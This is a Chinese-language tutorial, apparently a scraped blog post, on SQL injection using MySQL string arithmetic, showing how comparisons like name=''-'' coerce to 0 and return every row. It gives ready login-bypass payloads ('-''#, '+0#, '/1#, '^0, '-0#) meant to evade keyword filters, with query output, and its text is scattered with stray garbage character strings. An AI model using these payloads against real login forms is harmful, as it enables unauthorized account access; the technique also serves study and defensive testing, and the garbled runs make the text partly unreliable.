使用MySQL字符串运算实施精巧化SQL注入攻击

admin

我们先来看这样一个场景。 5 t3 N& p; _/ b& l2 G有以下表结构： 0 g. m0 }2 d5 J/ Pmysql> desc admin; 2 E% B2 K' ^, a$ D5 t; B+----------+--------------+------+-----+---------+----------------+ | Field    | Type         | Null | Key | Default | Extra          | +----------+--------------+------+-----+---------+----------------+ + F( n; U9 B" c| id       | mediumint(9) | NO   | PRI | NULL    | auto_increment | | name     | char(32)     | NO   | UNI | NULL    |                | | password | char(32)     | NO   | UNI | NULL    |                | +----------+--------------+------+-----+---------+----------------+ 3 rows in set (0.00 sec) 执行select * from admin;，成功返回所有记录内容。 +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ |  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 |   {  J# H! l( M& i6 ?" q|  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | |  4 | n00b   | ff80e8508d39047460921792273533a4 | 8 x0 Y9 ]: Y4 l# K8 \# W+----+--------+----------------------------------+ ) T  I2 W3 c/ S1 Y& L4 N4 j3 rows in set (0.00 sec) 6 M6 n$ W. f8 H; \. W执行select * from admin where name=”;，没有匹配到任何记录。 mysql> select * from admin where name = ''; ( c' \. Y+ g4 k# ~4 u( p3 cEmpty set (0.00 sec) $ i+ p" g: L/ S% R5 Z4 g$ K- f那么我们来执行select * from admin where name = ”-”; . z5 g, J. f: x' ^; R6 D6 I7 V +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ |  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | |  4 | n00b   | ff80e8508d39047460921792273533a4 | +----+--------+----------------------------------+ 3 rows in set, 3 warnings (0.00 sec) 8 g7 }& Q1 N9 e; ~0 \6 S+ S可以看到，也成功返回了所有记录，但是有三个warnings，我们看下警告信息： mysql> show warnings; +---------+------+------------------------------------------ 1 x8 X0 f" O9 U1 E5 K& d$ [$ ]% d) P| Level   | Code | Message +---------+------+------------------------------------------ & }  ]% B+ R# \' c0 G2 ^: F, @1 w| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin | Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s | Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b , \- L2 `$ x2 i! ?+---------+------+------------------------------------------ 3 rows in set (0.00 sec) 提示截断了错误的DOUBLE值’admin等等，当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ”-”;看下结果。 % \6 b# l. s) N9 K6 p5 N 1 N4 T/ G7 z) ]) Xmysql> select ''-''; +-------+ 0 k: D( H( @3 J  b. l; `| ''-'' | +-------+ |     0 | 3 o8 r6 t- G1 y. t8 \+-------+ / C. J9 }* J6 ]1 row in set (0.00 sec) 1 R  l; r. B- e' I返回0，也就是说我们查询的每一行的name子段都会和0做对比，这样就会触发一个类型转换，对name字段转换的结果也必然为0： ' V  [6 ~! Z+ v0 ~4 _; f " P: m# N8 O  N! V& A; emysql> select CAST((select name from admin limit 1,1) as DECIMAL); 5 u- j  H5 e/ K+-----------------------------------------------------+ , w  a: g+ [1 f0 N, e! \| CAST((select name from admin limit 1,1) as DECIMAL) | 2 z& m) Z. L9 X. t  K/ N+-----------------------------------------------------+ |                                                   0 | +-----------------------------------------------------+ 1 row in set, 1 warning (0.00 sec) 因此where语句构成了相等的条件，where 0=”=”，记录被返回。 & H/ U0 f% D5 XSQL注入场景: http://www.sqlzoo.net/hack/ " y7 ^- k7 J3 W- ~+ C/ l , V3 r% _" @- U! @7 `: Q & Y: k- o6 n7 U$ F9 K) K8 I " s- M1 m# x" Q. }# ^ 如果我们想绕过登录验证，上面已经给出了一个传统的tips：用户名密码均为’ or ”=’ 这样的逻辑和绕过方式很常见，这里不再具体解释了。 那么通过这次发现的技巧，可以使用一种相当精巧的方式，且避免使用SQL关键字，来绕过登录。 5 P1 e) J$ _% J0 }) l 仅仅在name子段输入’-”#，password留空，即可绕过登录验证。 ! I$ i6 t+ R+ D0 c& E' z, q- J; P 6 M2 o' U$ r# T& o    除了”-”，其他运算符”+”,”*”,”^”都会有同样的效果。 再继续进行测试，我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可 # x) z0 i) ^2 m4 l" V( X9 X mysql> select ''/1; +------+ | ''/1 | 9 U" ~8 H- i. V' f3 i+------+ |    0 | +------+ 1 row in set (0.00 sec) 3 ~' C$ o& b! p- d类似的”+0,”-0,”*0,”^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。   6 @) n# `- Q7 Z, N8 C1 ^利用这样一种特性，当目标对注入语句中的SQL关键字进行过滤时，便可通过这样一种方式进行Bypass。